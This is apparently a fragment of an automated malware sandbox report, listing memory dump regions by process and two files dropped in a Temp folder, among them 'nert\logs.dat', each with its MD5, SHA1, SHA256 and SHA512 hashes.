memory/2160-112-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4908-113-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4908-115-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2448-114-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2160-122-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2160-121-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2160-119-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2448-118-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4908-117-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2448-116-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zwogkiwmdapiaocrcpyqtwcwpd

MD5 1891919175c888ce82e9bd8a047b01ad
SHA1 502a6892a5d27ecb791ac5aa6d8586944f540453
SHA256 a6c43b4e4b8681cf0ef56c49c730fa77e34dc82db0260253a3ba75039030b9ec
SHA512 8bb940050b1abf6c27db133ed446f41e108f670f361ed5102408832ce33d9b87cd0880723441f1632292eeeb0a319c4e0fac0ea659eb55ebe1130cc3e6c776a3

memory/1648-128-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1648-132-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1648-131-0x0000000010000000-0x0000000010019000-memory.dmp

memory/1648-133-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-138-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-139-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nert\logs.dat

MD5 a089abc48493601dc7126b7094897b91
SHA1 19fe730ce0196712c6aee08e24a6a5839002abda
SHA256 d9ccacd2e0812c6a5e5735eeef520bcbee81d5468bb3095f029702c97eb62d92
SHA512 e1266e5a7f10d66cdb3959b853aa8159f72450b0fda088332f125c78e5abb60d81ebc797e7a6123cee4a250f8e6e20d6fe3283a30754fa1ad02ad430824c7dff

memory/1648-146-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-147-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-155-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-154-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-162-0x0000000000400000-0x0000000000482000-memory.dmp

memory/1648-163-0x0000000000400000-0x0000000000482000-memory.dmp